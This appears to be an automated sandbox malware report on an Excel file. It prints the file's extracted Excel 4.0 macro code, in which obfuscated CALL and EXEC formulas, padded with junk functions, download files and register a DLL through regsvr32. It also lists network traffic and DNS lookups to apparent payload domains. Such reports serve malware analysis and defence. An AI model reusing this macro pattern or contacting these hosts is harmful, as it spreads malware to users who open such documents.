                                                                                                                                                                                          SHA1:BA93BD2004227ED2CDF24A8C4D9EF06CB3E94BDA
                                                                                                                                                                                          SHA-256:3FAE64137BACED111FB9425369BB705B981B22D17E4D81895A70EC4965A15B87
                                                                                                                                                                                          SHA-512:737CBF9BC8AA1E29D8CAAD91309AD0CA0959F7ADF8137E315758BF99A7D5C356A637817EC52721F9FC54F4F2E8806FEEBF3ED0CA4D68DFA5E0EC9DD82FD46B41
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...,...8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......8...........A.r.i.a.l.1.......<...........A.r.i.a.l.1.......4...........A.r.i.a.l.1.......4...........A.r.i.a.l.1...h...8...........C.a.m.b.r.i.a.1...................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1.......>..........A.r.i.a.l.1.......?..........A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................C.a.l.i.b.r.i.1..................A.r.i.a.l.1..................A.r.i.a.l.1..................A.r.i.a.l.1...............

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                                                                                                                                          Entropy (8bit):3.258986427712615
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                          File name:54402971_by_Libranalysis.xls
                                                                                                                                                                                          File size:375808
                                                                                                                                                                                          MD5:54402971cab910b3d8ddc38caceeddba
                                                                                                                                                                                          SHA1:5038515d2a152a834139673a3ffed90f6a4ffdab
                                                                                                                                                                                          SHA256:d9ce158a711cffda14fc13daf5f8c673e671f8f1033fe44a8af947a95d8e6e72
                                                                                                                                                                                          SHA512:f9dbfe85c4fb6906f91713d0c6409568aaa15919e15adc1b1521849dac781e2d5922b4dd795bfec3b45265009ed2dfe372768d1cea0f4934afdea5c1003ca5c8
                                                                                                                                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbcJ:vUGAt6Uqa5DPdG9uS9QLp4l+s+U8
                                                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                          Static OLE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Document Type:OLE
                                                                                                                                                                                          Number of OLE Files:1

                                                                                                                                                                                          OLE File "54402971_by_Libranalysis.xls"

                                                                                                                                                                                          Indicators

                                                                                                                                                                                          Has Summary Info:True
                                                                                                                                                                                          Application Name:Microsoft Excel
                                                                                                                                                                                          Encrypted Document:False
                                                                                                                                                                                          Contains Word Document Stream:False
                                                                                                                                                                                          Contains Workbook/Book Stream:True
                                                                                                                                                                                          Contains PowerPoint Document Stream:False
                                                                                                                                                                                          Contains Visio Document Stream:False
                                                                                                                                                                                          Contains ObjectPool Stream:
                                                                                                                                                                                          Flash Objects Count:
                                                                                                                                                                                          Contains VBA Macros:True

                                                                                                                                                                                          Summary

                                                                                                                                                                                          Code Page:1251
                                                                                                                                                                                          Author:van-van
                                                                                                                                                                                          Last Saved By:vi-vi
                                                                                                                                                                                          Create Time:2006-09-16 00:00:00
                                                                                                                                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                                                                                                                                          Creating Application:Microsoft Excel
                                                                                                                                                                                          Security:0

                                                                                                                                                                                          Document Summary

                                                                                                                                                                                          Document Code Page:1251
                                                                                                                                                                                          Thumbnail Scaling Desired:False
                                                                                                                                                                                          Contains Dirty Links:False

                                                                                                                                                                                          Streams

                                                                                                                                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                          Entropy:0.287037498961
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:\x5SummaryInformation
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Stream Size:4096
                                                                                                                                                                                          Entropy:0.290777742057
                                                                                                                                                                                          Base64 Encoded:False
                                                                                                                                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                                                                                                                                          General
                                                                                                                                                                                          Stream Path:Book
                                                                                                                                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                          Stream Size:363283
                                                                                                                                                                                          Entropy:3.24522262131
                                                                                                                                                                                          Base64 Encoded:True
                                                                                                                                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                          Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 05 76 69 2d 76 69 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                          Macro 4.0 Code

                                                                                                                                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                                                                                                                                          
                                                                                                                                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                                                                                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                                                                                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Network Port Distribution

                                                                                                                                                                                          TCP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          May 12, 2021 16:46:16.533792019 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:16.695039988 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.695152044 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:16.696307898 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:16.857527018 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.864212990 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.864276886 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.864312887 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.864411116 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:16.864434004 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:16.877434969 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.039325953 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.039565086 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.040343046 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.242049932 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.300071955 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.300143957 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.300256968 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.300308943 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.300422907 CEST49732443192.168.2.4192.185.39.58
                                                                                                                                                                                          May 12, 2021 16:46:17.369700909 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.463298082 CEST44349732192.185.39.58192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.531811953 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.531897068 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.532735109 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.696630955 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.700771093 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.700834990 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.700875998 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.700965881 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.700999022 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.701004028 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.711666107 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.881499052 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.881608963 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:17.882285118 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:18.084572077 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:18.804514885 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:18.804986000 CEST44349733192.185.32.232192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:18.805088997 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:18.807229042 CEST49733443192.168.2.4192.185.32.232
                                                                                                                                                                                          May 12, 2021 16:46:18.969454050 CEST44349733192.185.32.232192.168.2.4

                                                                                                                                                                                          UDP Packets

                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          May 12, 2021 16:45:57.834115982 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:45:57.892483950 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:45:58.493758917 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:45:58.542612076 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:01.986268997 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:02.035130024 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:03.037105083 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:03.088838100 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:04.589818954 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:04.641324043 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:10.033252954 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:10.084955931 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:11.534092903 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:11.612268925 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:11.632877111 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:11.663990974 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:12.075593948 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:12.147320032 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:13.119990110 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:13.194258928 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:13.462425947 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:13.511229038 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:14.166182995 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:14.223642111 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.070741892 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:16.119472027 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.213319063 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:16.263860941 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:16.480597973 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:16.531647921 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.317919970 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:17.366645098 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:17.420548916 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:17.472131014 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:18.598500013 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:18.655881882 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:19.760977983 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:19.810019016 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:20.502527952 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:20.559839964 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:22.096209049 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:22.147814989 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:24.885351896 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:24.934195042 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:26.041670084 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:26.092377901 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:27.149137974 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:27.206201077 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:28.311454058 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:28.362405062 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:28.551691055 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:28.619785070 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:29.414971113 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:29.466674089 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:30.526673079 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:30.575359106 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:46:52.840464115 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:46:52.899981976 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:03.084662914 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:03.150491953 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:20.426423073 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:20.487746000 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:44.381437063 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:44.596225977 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:45.213710070 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:45.276520967 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:45.868119001 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:45.925997972 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:46.580962896 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:46.734215021 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:49.041718960 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:49.104244947 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:50.635258913 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:50.687006950 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:51.277853966 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:51.337605953 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:52.822619915 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:52.879697084 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:53.544375896 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:53.611713886 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:54.379489899 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:54.438421965 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:47:55.060447931 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:47:55.120455980 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                                                          May 12, 2021 16:48:11.028080940 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                                                          May 12, 2021 16:48:11.106415987 CEST53605428.8.8.8192.168.2.4

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                          May 12, 2021 16:46:16.480597973 CEST192.168.2.48.8.8.80xe5dbStandard query (0)signifysystem.comA (IP address)IN (0x0001)
                                                                                                                                                                                          May 12, 2021 16:46:17.317919970 CEST192.168.2.48.8.8.80x9c12Standard query (0)fcventasyservicios.clA (IP address)IN (0x0001)

                                                                                                                                                                                          DNS Answers

